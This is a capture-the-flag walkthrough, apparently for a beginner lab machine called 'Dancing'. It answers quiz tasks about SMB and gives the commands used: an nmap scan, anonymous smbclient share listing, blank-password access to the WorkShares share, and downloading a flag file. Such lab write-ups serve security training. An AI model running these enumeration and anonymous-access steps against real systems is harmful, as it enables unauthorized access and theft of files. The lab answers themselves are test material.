Dancing

Target Information:

  • 10.129.174.16
  • PORTS:
    • 135/tcp open msrpc
    • 139/tcp open netbios-ssn
    • 445/tcp open microsoft-ds
  • NETWORK SHARES:
    • ADMIN$ Disk Remote Admin
    • C$ Disk Default share
    • IPC$ IPC Remote IPC
    • WorkShares Disk

============================================

Task #1: What does the 3-letter acronym SMB stand for?

  • A: Server Message Block

Task #2: What port does SMB use to operate at?

  • A: 445

Task #3: What is the service name for port 445 that came up in our Nmap scan?

  • A: microsoft-ds
  • nmap 10.129.174.16

Task #4: What is the 'flag' or 'switch' we can use with the SMB tool to 'list' the contents of the share?

  • A: -L

Task #5: How many shares are there on Dancing?

  • A: 4
  • smbclient -N -L 10.129.174.16

Task #6: What is the name of the share we are able to access in the end with a blank password?

  • A: WorkShares
  • smbclient -N \\\\10.129.174.16\\WorkShares

Task #7: What is the command we can use within the SMB shell to download the files we find?

  • A: get
  • help

Root Flag:

  • get Amy.J/worknotes.txt worknotes.txt
  • get James.P\flag.txt